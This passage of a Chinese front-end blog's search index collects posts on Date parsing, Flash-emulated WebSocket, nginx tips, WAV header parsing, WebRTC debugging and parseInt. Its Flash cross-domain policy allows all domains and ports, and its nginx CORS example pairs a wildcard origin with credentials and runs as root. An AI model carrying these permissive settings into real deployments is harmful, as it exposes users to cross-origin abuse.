string的格式都不一样。\n你最好不要去先入为主,认为浏览器会支持的你的格式。\n常见的格式 2010-10-10 19:00:00 就这种格式,在IE11上是不接受的。\n下面的比较,在IE11上返回false, 在chrome上返回true。原因就在于,IE11不支持这种格式。\nnew Date() \u0026gt; new Date(\u0026#39;2010-10-10 19:00:00\u0026#39;) 所以在时间处理上,最好选用比价靠谱的第三方库,例如dayjs, moment等等。\n千万不要先入为主!!","title":"new Date('time string')的陷阱"},{"content":"IE8/9原生是不支持WebSocket的,但是我们可以使用flash去模拟一个WebSocket接口出来。\n这方面,https://github.com/gimite/web-socket-js 已经可以使用。\n除了客户端之外,服务端需要做个flash安全策略设置。\n这里的服务端是指WebSocet服务器所在的服务端。默认端口是843端口。\n客户端使用flash模拟WebSocket时,会打开一个到服务端843端口的TCP链接。\n并且发送数据:\n\u0026lt;policy-file-request\u0026gt;. 服务端需要回应下面类似的内容\n\u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;!DOCTYPE cross-domain-policy SYSTEM \u0026#34;/xml/dtds/cross-domain-policy.dtd\u0026#34;\u0026gt; \u0026lt;cross-domain-policy\u0026gt; \u0026lt;site-control permitted-cross-domain-policies=\u0026#34;all\u0026#34;/\u0026gt; \u0026lt;allow-access-from domain=\u0026#34;*\u0026#34; to-ports=\u0026#34;*\u0026#34; secure=\u0026#34;false\u0026#34;/\u0026gt; \u0026lt;allow-http-request-headers-from domain=\u0026#34;*\u0026#34; headers=\u0026#34;*\u0026#34;/\u0026gt; \u0026lt;/cross-domain-policy\u0026gt; Node.js实现 policy.js module.exports.policyFile = `\u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;!DOCTYPE cross-domain-policy SYSTEM \u0026#34;/xml/dtds/cross-domain-policy.dtd\u0026#34;\u0026gt; \u0026lt;cross-domain-policy\u0026gt; \u0026lt;site-control permitted-cross-domain-policies=\u0026#34;all\u0026#34;/\u0026gt; \u0026lt;allow-access-from domain=\u0026#34;*\u0026#34; to-ports=\u0026#34;*\u0026#34; secure=\u0026#34;false\u0026#34;/\u0026gt; \u0026lt;allow-http-request-headers-from domain=\u0026#34;*\u0026#34; headers=\u0026#34;*\u0026#34;/\u0026gt; \u0026lt;/cross-domain-policy\u0026gt;` index.js const Net = require(\u0026#39;net\u0026#39;) const {policyFile} = require(\u0026#39;./policy\u0026#39;) const port = 843 console.log(policyFile) const server = new Net.Server() server.listen(port, function() { console.log(`Server listening for connection requests on socket localhost:${port}`); }); server.on(\u0026#39;connection\u0026#39;, function(socket) { console.log(\u0026#39;A new connection has been established.\u0026#39;); socket.end(policyFile) socket.on(\u0026#39;data\u0026#39;, function(chunk) { console.log(`Data received from client: ${chunk.toString()}`); }); socket.on(\u0026#39;end\u0026#39;, function() { console.log(\u0026#39;Closing connection with the client\u0026#39;); }); socket.on(\u0026#39;error\u0026#39;, function(err) { console.log(`Error: ${err}`); }); }); ","permalink":"https://wdd.js.org/fe/ie89-websocket-flash/","summary":"IE8/9原生是不支持WebSocket的,但是我们可以使用flash去模拟一个WebSocket接口出来。\n这方面,https://github.com/gimite/web-socket-js 已经可以使用。\n除了客户端之外,服务端需要做个flash安全策略设置。\n这里的服务端是指WebSocet服务器所在的服务端。默认端口是843端口。\n客户端使用flash模拟WebSocket时,会打开一个到服务端843端口的TCP链接。\n并且发送数据:\n\u0026lt;policy-file-request\u0026gt;. 服务端需要回应下面类似的内容\n\u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;!DOCTYPE cross-domain-policy SYSTEM \u0026#34;/xml/dtds/cross-domain-policy.dtd\u0026#34;\u0026gt; \u0026lt;cross-domain-policy\u0026gt; \u0026lt;site-control permitted-cross-domain-policies=\u0026#34;all\u0026#34;/\u0026gt; \u0026lt;allow-access-from domain=\u0026#34;*\u0026#34; to-ports=\u0026#34;*\u0026#34; secure=\u0026#34;false\u0026#34;/\u0026gt; \u0026lt;allow-http-request-headers-from domain=\u0026#34;*\u0026#34; headers=\u0026#34;*\u0026#34;/\u0026gt; \u0026lt;/cross-domain-policy\u0026gt; Node.js实现 policy.js module.exports.policyFile = `\u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;!DOCTYPE cross-domain-policy SYSTEM \u0026#34;/xml/dtds/cross-domain-policy.dtd\u0026#34;\u0026gt; \u0026lt;cross-domain-policy\u0026gt; \u0026lt;site-control permitted-cross-domain-policies=\u0026#34;all\u0026#34;/\u0026gt; \u0026lt;allow-access-from domain=\u0026#34;*\u0026#34; to-ports=\u0026#34;*\u0026#34; secure=\u0026#34;false\u0026#34;/\u0026gt; \u0026lt;allow-http-request-headers-from domain=\u0026#34;*\u0026#34; headers=\u0026#34;*\u0026#34;/\u0026gt; \u0026lt;/cross-domain-policy\u0026gt;` index.js const Net = require(\u0026#39;net\u0026#39;) const {policyFile} = require(\u0026#39;./policy\u0026#39;) const port = 843 console.log(policyFile) const server = new Net.Server() server.listen(port, function() { console.log(`Server listening for connection requests on socket localhost:${port}`); }); server.","title":"IE8/9 支持WebSocket方案,flash安全策略"},{"content":"电脑的风扇声突然响了起来,我知道有某个进程在占用大量CPU资源。\n在任务管理器中,可以看到vscode占用的的CPU资源达到150。说明问题出在vscode上。\n在vscode中,按F1, 输入: show running extensions 可以查看所有插件的运行状况。\n其中需要关注最重要的指标就是活动时间:如果某个插件的活动时间明显是其他插件的好多倍,那问题就可能出在这个插件上。要么禁用该插件,要么卸载该插件。\n","permalink":"https://wdd.js.org/fe/vscode-high-cpu/","summary":"电脑的风扇声突然响了起来,我知道有某个进程在占用大量CPU资源。\n在任务管理器中,可以看到vscode占用的的CPU资源达到150。说明问题出在vscode上。\n在vscode中,按F1, 输入: show running extensions 可以查看所有插件的运行状况。\n其中需要关注最重要的指标就是活动时间:如果某个插件的活动时间明显是其他插件的好多倍,那问题就可能出在这个插件上。要么禁用该插件,要么卸载该插件。","title":"为什么vscode会占用大量CPU资源?"},{"content":"js原生支持16进制、10进制、8进制的直接定义\nvar a = 21 // 十进制 var b = 0xee // 十六进制, 238 var c = 013 // 八进制 11 十进制转二进制字符串 var a = 21 // 十进制 a.toString(2) // \u0026#34;10101\u0026#34; 二进制转10进制 var d = \u0026#34;10101\u0026#34; parseInt(\u0026#39;10101\u0026#39;,2) // 21 ","permalink":"https://wdd.js.org/fe/bin-number-operator/","summary":"js原生支持16进制、10进制、8进制的直接定义\nvar a = 21 // 十进制 var b = 0xee // 十六进制, 238 var c = 013 // 八进制 11 十进制转二进制字符串 var a = 21 // 十进制 a.toString(2) // \u0026#34;10101\u0026#34; 二进制转10进制 var d = \u0026#34;10101\u0026#34; parseInt(\u0026#39;10101\u0026#39;,2) // 21 ","title":"js中二进制的操作"},{"content":"const fs = require(\u0026#39;fs\u0026#39;) var request = require(\u0026#39;request\u0026#39;) const zlib = require(\u0026#39;zlib\u0026#39;) const log = require(\u0026#39;./log.js\u0026#39;) const fileType = \u0026#39;\u0026#39; let endCount = 0 module.exports = (item) =\u0026gt; { return new Promise((resolve, reject) =\u0026gt; { request.get(item.url) .on(\u0026#39;error\u0026#39;, (error) =\u0026gt; { log.error(`下载失败${item.name}`) reject(error) }) .pipe(zlib.createGunzip()) .pipe(fs.createWriteStream(item.name + fileType)) .on(\u0026#39;finish\u0026#39;, (res) =\u0026gt; { log.info(`${++endCount} 完成下载 ${item.name + fileType}`) resolve(res) }) }) } ","permalink":"https://wdd.js.org/fe/nodejs-stream-unzip/","summary":"const fs = require(\u0026#39;fs\u0026#39;) var request = require(\u0026#39;request\u0026#39;) const zlib = require(\u0026#39;zlib\u0026#39;) const log = require(\u0026#39;./log.js\u0026#39;) const fileType = \u0026#39;\u0026#39; let endCount = 0 module.exports = (item) =\u0026gt; { return new Promise((resolve, reject) =\u0026gt; { request.get(item.url) .on(\u0026#39;error\u0026#39;, (error) =\u0026gt; { log.error(`下载失败${item.name}`) reject(error) }) .pipe(zlib.createGunzip()) .pipe(fs.createWriteStream(item.name + fileType)) .on(\u0026#39;finish\u0026#39;, (res) =\u0026gt; { log.info(`${++endCount} 完成下载 ${item.name + fileType}`) resolve(res) }) }) } ","title":"NodeJS边下载边解压gz文件"},{"content":"下面的命令可以生成一个v8的日志如 isolate-0x102d4e000-86008-v8.log\n\u0026ndash;log-source-code 不是必传的字段,加了该字段可以在定位到源码 node --prof --log-source-code index.js 下一步是将log文件转成json\nnode --prof-process --preprocess isolate-0x102d4e000-86008-v8.log \u0026gt; v8.json 然后打开 https://wangduanduan.gitee.io/v8-profiling/ 这个页面,选择v8.json\n下图横坐标是时间,纵坐标是cpu百分比。\n选择Bottom Up之后,展开JS unoptimized, 可以发现占用cpu比较高的代码的位置。\n","permalink":"https://wdd.js.org/fe/v8-profile/","summary":"下面的命令可以生成一个v8的日志如 isolate-0x102d4e000-86008-v8.log\n\u0026ndash;log-source-code 不是必传的字段,加了该字段可以在定位到源码 node --prof --log-source-code index.js 下一步是将log文件转成json\nnode --prof-process --preprocess isolate-0x102d4e000-86008-v8.log \u0026gt; v8.json 然后打开 https://wangduanduan.gitee.io/v8-profiling/ 这个页面,选择v8.json\n下图横坐标是时间,纵坐标是cpu百分比。\n选择Bottom Up之后,展开JS unoptimized, 可以发现占用cpu比较高的代码的位置。","title":"V8 Profile"},{"content":"1. 启动?停止?reload配置 nginx -s reload # 热重启 nginx -s reopen # 重启Nginx nginx -s stop # 快速关闭 nginx -s quit # 等待工作进程处理完成后关闭 nginx -T # 查看配置文件的实际内容 2. nginx如何做反向http代理 location ^~ /api { proxy_pass http://192.168.40.174:32020; } 3. nginx要如何配置才能处理跨域问题 location ^~ /p/asm { proxy_pass http://192.168.40.174:32020; add_header \u0026#39;Access-Control-Allow-Origin\u0026#39; \u0026#39;*\u0026#39; always; add_header \u0026#39;Access-Control-Allow-Credentials\u0026#39; \u0026#39;true\u0026#39; always; add_header \u0026#39;Access-Control-Allow-Methods\u0026#39; \u0026#39;GET,POST,PUT,DELETE,PATCH,OPTIONS\u0026#39;; add_header \u0026#39;Access-Control-Allow-Headers\u0026#39; \u0026#39;Content-Type,ssid\u0026#39;; if ($request_method = \u0026#39;OPTIONS\u0026#39;) {return 204;} proxy_redirect off; proxy_set_header Host $host; } 4. 如何拦截某个请求,直接返回某个状态码? location ^~ /p/asm { return 204 \u0026#34;OK\u0026#34;; } 5. 如何给某个路径的请求设置独立的日志文件? location ^~ /p/asm { access_log /var/log/nginx/a.log; error_log /var/log/nginx/a.err.log; } 6. 如何设置nginx的静态文件服务器 location / { add_header Cache-Control max-age=360000; root /usr/share/nginx/html/webrtc-sdk/dist/; } # 如果目标地址中没有video, video只是用来识别路径的,则需要使用 # rewrite指令去去除video路径 # 否则访问/video 就会转到 /home/resources/video 路径 location /video { rewrite /video/(.*) /$1 break; add_header Cache-Control max-age=360000; autoindex on; root /home/resources/; } 7. 反向代理时,如何做路径重写? 使用 rewrite 指令,例如 rewrite /p/(.*) /$1 break; 8. Nginx如何配置才能做websocket代理? location ^~ /websocket { proxy_pass http://192.168.40.174:31089; proxy_http_version 1.1; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection \u0026#34;Upgrade\u0026#34;; } 9. 如何调整nginx的最大打开文件限制 设置worker_rlimit_nofile\nuser root root; worker_processes 4; worker_rlimit_nofile 65535; 10. 如何判断worker_rlimit_nofile是否生效? 11. 直接返回文本 location / { default_type text/plain; return 502 \u0026#34;服务正在升级,请稍后再试……\u0026#34;; } location / { default_type text/html; return 502 \u0026#34;服务正在升级,请稍后再试……\u0026#34;; } location / { default_type application/json; return 502 \u0026#39;{\u0026#34;status\u0026#34;:502,\u0026#34;msg\u0026#34;:\u0026#34;服务正在升级,请稍后再试……\u0026#34;}\u0026#39;; } 13. 多种日志格式 例如,不通的反向代理,使用不同的日志格式。\n例如下面,定义了三种日志格式main, mian1, main2。\n在access_log 指令的路径之后,指定日志格式就可以了。\nhttp { log_format main \u0026#39;$time_iso8601 $remote_addr $status $request\u0026#39;; log_format main2 \u0026#39;$remote_addr $status $request\u0026#39;; log_format main3 \u0026#39;$status $request\u0026#39;; access_log /var/log/nginx/access.log main; 14. 权限问题 例如某些端口无法监听,则需要检查是否被selinux给拦截了。 或者nginx的启动用户不是root用户导致无法访问某些root用户的目录。\n参考 https://mp.weixin.qq.com/s/JUOyAe1oEs-WwmEmsHRn8w https://www.nginx.com/blog/tcp-load-balancing-udp-load-balancing-nginx-tips-tricks/ https://www.cnblogs.com/freeweb/p/5944894.html ","permalink":"https://wdd.js.org/fe/nginx-tips/","summary":"1. 启动?停止?reload配置 nginx -s reload # 热重启 nginx -s reopen # 重启Nginx nginx -s stop # 快速关闭 nginx -s quit # 等待工作进程处理完成后关闭 nginx -T # 查看配置文件的实际内容 2. nginx如何做反向http代理 location ^~ /api { proxy_pass http://192.168.40.174:32020; } 3. nginx要如何配置才能处理跨域问题 location ^~ /p/asm { proxy_pass http://192.168.40.174:32020; add_header \u0026#39;Access-Control-Allow-Origin\u0026#39; \u0026#39;*\u0026#39; always; add_header \u0026#39;Access-Control-Allow-Credentials\u0026#39; \u0026#39;true\u0026#39; always; add_header \u0026#39;Access-Control-Allow-Methods\u0026#39; \u0026#39;GET,POST,PUT,DELETE,PATCH,OPTIONS\u0026#39;; add_header \u0026#39;Access-Control-Allow-Headers\u0026#39; \u0026#39;Content-Type,ssid\u0026#39;; if ($request_method = \u0026#39;OPTIONS\u0026#39;) {return 204;} proxy_redirect off; proxy_set_header Host $host; } 4. 如何拦截某个请求,直接返回某个状态码? location ^~ /p/asm { return 204 \u0026#34;OK\u0026#34;; } 5.","title":"前端必会的nginx知识点"},{"content":"WebSocket断开码,一般是用到的是从1000-1015。\n正常的断开码是1000。其他的都是异常断开。\n场景 服务端断开码 备注 刷新浏览器页面 1001 终端离开, 可能因为服务端错误, 也可能因为浏览器正从打开连接的页面跳转离开. 关闭浏览器tab页面 1001 终端离开, 可能因为服务端错误, 也可能因为浏览器正从打开连接的页面跳转离开. 关闭浏览器, 所有标签页都会关闭。 1001 可以发现。无论是刷新,关闭tab页面还是关闭浏览器,错误码都是1001 ws.close() 1005 主动调用close, 不传递错误码。对服务端来说,也是异常断开。1005表示没有收到预期的状态码. ws.close(1000) 1000 正常的关闭,客户端必需传递正确的错误原因码。原因码不是随便填入的。比如 ws.close(1009)aFailed to execute \u0026lsquo;close\u0026rsquo; on \u0026lsquo;WebSocket\u0026rsquo;: The code must be either 1000, or between 3000 and 4999. 1009 is neither. 客户端断网 ","permalink":"https://wdd.js.org/fe/websocket-disconnect-test/","summary":"WebSocket断开码,一般是用到的是从1000-1015。\n正常的断开码是1000。其他的都是异常断开。\n场景 服务端断开码 备注 刷新浏览器页面 1001 终端离开, 可能因为服务端错误, 也可能因为浏览器正从打开连接的页面跳转离开. 关闭浏览器tab页面 1001 终端离开, 可能因为服务端错误, 也可能因为浏览器正从打开连接的页面跳转离开. 关闭浏览器, 所有标签页都会关闭。 1001 可以发现。无论是刷新,关闭tab页面还是关闭浏览器,错误码都是1001 ws.close() 1005 主动调用close, 不传递错误码。对服务端来说,也是异常断开。1005表示没有收到预期的状态码. ws.close(1000) 1000 正常的关闭,客户端必需传递正确的错误原因码。原因码不是随便填入的。比如 ws.close(1009)aFailed to execute \u0026lsquo;close\u0026rsquo; on \u0026lsquo;WebSocket\u0026rsquo;: The code must be either 1000, or between 3000 and 4999. 1009 is neither. 客户端断网 ","title":"WebSocket断开码测试"},{"content":"相比于普通的文件,二进制的文件略显神秘。本次就为大家揭开二进制文件的面纱。\nWAV文件的格式 下图是一个普通的wav文件的格式。其中除了最后的data部分,其他的每个格子都占用了固定大小的字节数。\n知道字节数之后,就需要按照正确的字节序读区。字节序读反了,可能读出一堆乱码。 关于字节序,可以参考阮一峰老师写的理解字节序这篇文章。\nstep1: 读取文件 const fs = require(\u0026#39;fs\u0026#39;) const path = require(\u0026#39;path\u0026#39;) const file = fs.readFileSync(path.join(__dirname, \u0026#39;./a.wav\u0026#39;)) console.log(file) 原始的打印,二进制以16进制的方式显示。看不出其中有何含义。\nnode main.js \u0026lt;Buffer 52 49 46 46 a4 23 48 00 57 41 56 45 66 6d 74 20 10 00 00 00 01 00 02 00 40 1f 00 00 00 7d 00 00 04 00 10 00 64 61 74 61 80 23 48 00 00 00 00 00 00 00 ... 4727674 more bytes\u0026gt; step2: 工具函数 // 将buf转为字符串 function buffer2String (buf) { let int = [] for (let i=0; i\u0026lt;buf.length; i++) { int.push(buf.readUInt8(i)) } return String.fromCharCode(...int) } // 对读区的头字段的值进行校验 // 实际上头字段之间是存在一定的关系的 function validWav (wav, fileSize) { //20 2 AudioFormat PCM = 1 (i.e. Linear quantization) // Values other than 1 indicate some // form of compression. // 22 2 NumChannels Mono = 1, Stereo = 2, etc. // 24 4 SampleRate 8000, 44100, etc. // 28 4 ByteRate == SampleRate * NumChannels * BitsPerSample/8 // 32 2 BlockAlign == NumChannels * BitsPerSample/8 // The number of bytes for one sample including // all channels. I wonder what happens when // this number isn\u0026#39;t an integer? // 34 2 BitsPerSample 8 bits = 8, 16 bits = 16, etc. if (wav.AudioFormat !== 1) { return 1 } if (![1,2].includes(wav.NumChannels)){ return 2 } if (![8000,44100].includes(wav.SampleRate)){ return 3 } if (![8,16].includes(wav.BitsPerSample)){ return 4 } if (wav.ByteRate !== wav.SampleRate * wav.NumChannels * wav.BitsPerSample / 8){ return 5 } if (wav.BlockAlign !== wav.NumChannels * wav.BitsPerSample / 8 ){ return 6 } if (wav.ChunkSize + 8 !== fileSize) { return 7 } return 0 } class ByteWalk { constructor(buf){ // 记录当前读过的字节数 this.current = 0 // 记录整个buf this.buf = buf } // 用来指定要读取的字节数,以及它的格式 step(s, f){ if (this.current === this.buf.length) { return } let bf if (arguments.length === 0) { s = this.buf.length - this.current } if (this.current + s \u0026gt;= this.buf.length) { bf = this.buf.slice(this.current, this.buf.length) this.current = this.buf.length } else { bf = this.buf.slice(this.current, this.current + s) this.current += s } // 一个特殊的标记,用来标记按照字符串的方式读取buf if (f === \u0026#39;readStringBE\u0026#39;) { return buffer2String(bf) } if (!f) { return bf } return bf[f](); } } function readData (buf, step, read) { let data = [] for (let i=0; i\u0026lt;buf.length; i += step) { data.push(buf[read](i)) } return data } module.exports = { buffer2String, // validFile, ByteWalk, validWav, readData } step3: main函数 const fs = require(\u0026#39;fs\u0026#39;) const path = require(\u0026#39;path\u0026#39;) const { ByteWalk, validWav, readData } = require(\u0026#39;./util\u0026#39;) const file = fs.readFileSync(path.join(__dirname, \u0026#39;./a.wav\u0026#39;)) const B = new ByteWalk(file) // 按照固定的字节数读取 let friendData = { ChunkID: B.step(4,\u0026#39;readStringBE\u0026#39;), ChunkSize: B.step(4, \u0026#39;readUInt32LE\u0026#39;), Format: B.step(4, \u0026#39;readStringBE\u0026#39;), Subchunk1ID: B.step(4, \u0026#39;readStringBE\u0026#39;), Subchunk1Size: B.step(4, \u0026#39;readUInt32LE\u0026#39;), AudioFormat: B.step(2, \u0026#39;readUInt16LE\u0026#39;), NumChannels: B.step(2, \u0026#39;readUInt16LE\u0026#39;), SampleRate: B.step(4, \u0026#39;readUInt32LE\u0026#39;), ByteRate: B.step(4, \u0026#39;readUInt32LE\u0026#39;), BlockAlign: B.step(2, \u0026#39;readUInt16LE\u0026#39;), BitsPerSample: B.step(2, \u0026#39;readUInt16LE\u0026#39;), Subchunk2ID: B.step(4, \u0026#39;readStringBE\u0026#39;), Subchunk2Size: B.step(4, \u0026#39;readUInt32LE\u0026#39;), Data: B.step() } // var data = readData(friendData.Data, friendData.BlockAlign, \u0026#39;readInt16LE\u0026#39;) console.log(validWav(friendData, file.length)) console.log(friendData, friendData.Data.length) // console.log(data) 从输出的内容可以看到,个个头字段基本上都读取出来了。\n0 { ChunkID: \u0026#39;RIFF\u0026#39;, ChunkSize: 4727716, Format: \u0026#39;WAVE\u0026#39;, Subchunk1ID: \u0026#39;fmt \u0026#39;, Subchunk1Size: 16, AudioFormat: 1, NumChannels: 2, SampleRate: 8000, ByteRate: 32000, BlockAlign: 4, BitsPerSample: 16, Subchunk2ID: \u0026#39;data\u0026#39;, Subchunk2Size: 4727680, Data: \u0026lt;Buffer 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ... 4727630 more bytes\u0026gt; } 4727680 想要深入理解wav文件格式的,可以看下最后的参考资料。\n之后大家可以从做一些有趣的事情,例如双声道的声音做声道分离,或者说双声道合并成单声道等等。\n参考资料 http://soundfile.sapp.org/doc/WaveFormat/ ","permalink":"https://wdd.js.org/fe/nodejs-read-wav-file/","summary":"相比于普通的文件,二进制的文件略显神秘。本次就为大家揭开二进制文件的面纱。\nWAV文件的格式 下图是一个普通的wav文件的格式。其中除了最后的data部分,其他的每个格子都占用了固定大小的字节数。\n知道字节数之后,就需要按照正确的字节序读区。字节序读反了,可能读出一堆乱码。 关于字节序,可以参考阮一峰老师写的理解字节序这篇文章。\nstep1: 读取文件 const fs = require(\u0026#39;fs\u0026#39;) const path = require(\u0026#39;path\u0026#39;) const file = fs.readFileSync(path.join(__dirname, \u0026#39;./a.wav\u0026#39;)) console.log(file) 原始的打印,二进制以16进制的方式显示。看不出其中有何含义。\nnode main.js \u0026lt;Buffer 52 49 46 46 a4 23 48 00 57 41 56 45 66 6d 74 20 10 00 00 00 01 00 02 00 40 1f 00 00 00 7d 00 00 04 00 10 00 64 61 74 61 80 23 48 00 00 00 00 00 00 00 .","title":"Node.js读取wav文件"},{"content":"什么是回铃音? 回铃音的特点\n回铃音是由运营商送给手机的,而不是由被叫送给主叫的。 回铃音的播放阶段是在被叫接听前播放,被叫一旦接听,回铃音则播放结束 回铃音一般是450Hz, 嘟一秒,停4秒,5秒一个周期 回铃音分为三种\n舒适噪音阶段:就是嘟一秒,停4秒的阶段 彩铃阶段:有的手机,在接听之前,会向主叫方播放个性化的语音,例如放点流行音乐之类的 定制回音阶段:例如被叫放立即把电话给拒绝了,但是主叫放这边并没有挂电话,而是在播放:对不起,您拨打的电话无人接听,请稍后再播 问题现象 WebRTC拨打出去之后,在客户接听之前,听不到任何回铃音。在客户接听之后,可以短暂的听到一点点回铃音。 问题排查思路 服务端问题 客户端问题 网络问题 网络架构 首先根据网络架构图,我决定在a点和b点进行抓包 抓包之后用wireshark进行分析。得出以下结论\nsip服务器AB之间用的是g711编码,语音流没有加密。从b点抓的包,能够从中提取出SIP服务器B向sip服务器A发送的语音流,可以听到回铃音。说明SIP服务器A是收到了回铃音的。 ab两点之间的WebRTC语音流是加密的,无法分析出其中是否含有语音流。 虽然无法提取出WebRTC语音流。但是通过wireshark Statistics -\u0026gt; Conversation 分析,得出结论:在电话接通之前,a点收到的udp包和从b点发出的udp包的数量是是一致的。说明webrtc客户端实际上是收到了语音流。只不过客户端没有播放。然后问题定位到客户端的js库。 通过分析客户端库的代码,定位到具体代码的位置。解决问题,并向开源库提交了修复bug的的pull request。实际上只是修改了一行代码。https://github.com/versatica/JsSIP/pull/669 问题总结 解决问题看似很简单,但是需要的很强的问题分析能力,并且对网络协议,网络架构,wireshark抓包分析都要精通,才能真正的看到深层次的东西。\n","permalink":"https://wdd.js.org/fe/webrtc-has-no-earlymedia/","summary":"什么是回铃音? 回铃音的特点\n回铃音是由运营商送给手机的,而不是由被叫送给主叫的。 回铃音的播放阶段是在被叫接听前播放,被叫一旦接听,回铃音则播放结束 回铃音一般是450Hz, 嘟一秒,停4秒,5秒一个周期 回铃音分为三种\n舒适噪音阶段:就是嘟一秒,停4秒的阶段 彩铃阶段:有的手机,在接听之前,会向主叫方播放个性化的语音,例如放点流行音乐之类的 定制回音阶段:例如被叫放立即把电话给拒绝了,但是主叫放这边并没有挂电话,而是在播放:对不起,您拨打的电话无人接听,请稍后再播 问题现象 WebRTC拨打出去之后,在客户接听之前,听不到任何回铃音。在客户接听之后,可以短暂的听到一点点回铃音。 问题排查思路 服务端问题 客户端问题 网络问题 网络架构 首先根据网络架构图,我决定在a点和b点进行抓包 抓包之后用wireshark进行分析。得出以下结论\nsip服务器AB之间用的是g711编码,语音流没有加密。从b点抓的包,能够从中提取出SIP服务器B向sip服务器A发送的语音流,可以听到回铃音。说明SIP服务器A是收到了回铃音的。 ab两点之间的WebRTC语音流是加密的,无法分析出其中是否含有语音流。 虽然无法提取出WebRTC语音流。但是通过wireshark Statistics -\u0026gt; Conversation 分析,得出结论:在电话接通之前,a点收到的udp包和从b点发出的udp包的数量是是一致的。说明webrtc客户端实际上是收到了语音流。只不过客户端没有播放。然后问题定位到客户端的js库。 通过分析客户端库的代码,定位到具体代码的位置。解决问题,并向开源库提交了修复bug的的pull request。实际上只是修改了一行代码。https://github.com/versatica/JsSIP/pull/669 问题总结 解决问题看似很简单,但是需要的很强的问题分析能力,并且对网络协议,网络架构,wireshark抓包分析都要精通,才能真正的看到深层次的东西。","title":"记一次WebRTC无回铃音问题排查"},{"content":"在PC端,使用WebRTC通话一般都会使用耳麦,如果耳麦有问题,可能就会报这个错。 所以最好多换几个耳麦,试试。\n","permalink":"https://wdd.js.org/fe/webrtc-domexception/","summary":"在PC端,使用WebRTC通话一般都会使用耳麦,如果耳麦有问题,可能就会报这个错。 所以最好多换几个耳麦,试试。","title":"WebRTC getUserMedia DOMException Requested Device not found"},{"content":"client.onConnect = function (frame) { console.log(\u0026#39;onConnect\u0026#39;, frame) client.subscribe(\u0026#39;/topic/event.agent.*.abc_cc\u0026#39;, function (msg) { console.log(msg) }, { id: \u0026#39;wdd\u0026#39;, \u0026#39;x-queue-name\u0026#39;: \u0026#39;wdd-queue\u0026#39; }) } 在mq管理端:\nOptional Arguments Optional queue arguments, also known as \u0026ldquo;x-arguments\u0026rdquo; because of their field name in the AMQP 0-9-1 protocol, is a map (dictionary) of arbitrary key/value pairs that can be provided by clients when a queue is declared. -https://www.rabbitmq.com/queues.html\n","permalink":"https://wdd.js.org/fe/stompjs-set-queue-name/","summary":"client.onConnect = function (frame) { console.log(\u0026#39;onConnect\u0026#39;, frame) client.subscribe(\u0026#39;/topic/event.agent.*.abc_cc\u0026#39;, function (msg) { console.log(msg) }, { id: \u0026#39;wdd\u0026#39;, \u0026#39;x-queue-name\u0026#39;: \u0026#39;wdd-queue\u0026#39; }) } 在mq管理端:\nOptional Arguments Optional queue arguments, also known as \u0026ldquo;x-arguments\u0026rdquo; because of their field name in the AMQP 0-9-1 protocol, is a map (dictionary) of arbitrary key/value pairs that can be provided by clients when a queue is declared. -https://www.rabbitmq.com/queues.html","title":"stompjs 使用x-queue-name指定队列名"},{"content":"最近看了一篇文章,里面提出一个问题?\nparseInt(0.0000005)为什么等于5?\n最终也给出了解释,parseInt的第一个参数,如果不是字符串的话, 将会调用ToString方法,将其转为字符串。\nstring The value to parse. If this argument is not a string, then it is converted to one using theToStringabstract operation. Leadingwhitespacein this argument is ignored. MDN\n我们在console面板上直接输入0.0000005回车之后发现是5e-7。我们使用toSting()方法转换之后发现是字符串5e7\n字符串5e-7转成整数5是没什么疑问的,问题在于为什么0.0000005转成5e-7。而如果少一个零,就可以看到console会原样输出。\n数值类型如何转字符串? 对于数值类型,是使用Number.toString()方法转换的。\nNumber.toString(x)的算法分析 这个算法并没有像我们想象的那么简单。\n先说一些简单场景\n简单场景 Number.toString(x) 如果x是NaN, 返回\u0026quot;NaN\u0026quot; 如果x是+0或者-0, 返回\u0026quot;0\u0026quot; 如果x是负数返回, 返回Number.toString(-x) 如果x是正无穷,返回\u0026quot;Infinity\u0026quot; 复杂场景 可以看出,0.0000005并不在简单场景中。下面就进入到复杂场景了。\n会用到一个公式\nk,s,n都是整数 k大于等于1 10的k-1次方小于等于s, 且s小于等于10的k次方 10的n-k次方属于实数 0.0000005可以表示为5*10的-7次方。代入上面的公式,可以算出: k=1, s=5, n=-6。\n参考 https://dmitripavlutin.com/parseint-mystery-javascript/ https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/parseInt https://tc39.es/ecma262/#sec-numeric-types-number-tostring ","permalink":"https://wdd.js.org/fe/parseint-with-little-number/","summary":"最近看了一篇文章,里面提出一个问题?\nparseInt(0.0000005)为什么等于5?\n最终也给出了解释,parseInt的第一个参数,如果不是字符串的话, 将会调用ToString方法,将其转为字符串。\nstring The value to parse. If this argument is not a string, then it is converted to one using theToStringabstract operation. Leadingwhitespacein this argument is ignored. MDN\n我们在console面板上直接输入0.0000005回车之后发现是5e-7。我们使用toSting()方法转换之后发现是字符串5e7\n字符串5e-7转成整数5是没什么疑问的,问题在于为什么0.0000005转成5e-7。而如果少一个零,就可以看到console会原样输出。\n数值类型如何转字符串? 对于数值类型,是使用Number.toString()方法转换的。\nNumber.toString(x)的算法分析 这个算法并没有像我们想象的那么简单。\n先说一些简单场景\n简单场景 Number.toString(x) 如果x是NaN, 返回\u0026quot;NaN\u0026quot; 如果x是+0或者-0, 返回\u0026quot;0\u0026quot; 如果x是负数返回, 返回Number.toString(-x) 如果x是正无穷,返回\u0026quot;Infinity\u0026quot; 复杂场景 可以看出,0.0000005并不在简单场景中。下面就进入到复杂场景了。\n会用到一个公式\nk,s,n都是整数 k大于等于1 10的k-1次方小于等于s, 且s小于等于10的k次方 10的n-k次方属于实数 0.0000005可以表示为5*10的-7次方。代入上面的公式,可以算出: k=1, s=5, n=-6。\n参考 https://dmitripavlutin.com/parseint-mystery-javascript/ https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/parseInt https://tc39.es/ecma262/#sec-numeric-types-number-tostring ","title":"parseInt(0.0000005)为什么等于5?"},{"content":"let a = {} let b = Object.create({}) let c = Object.create(null) 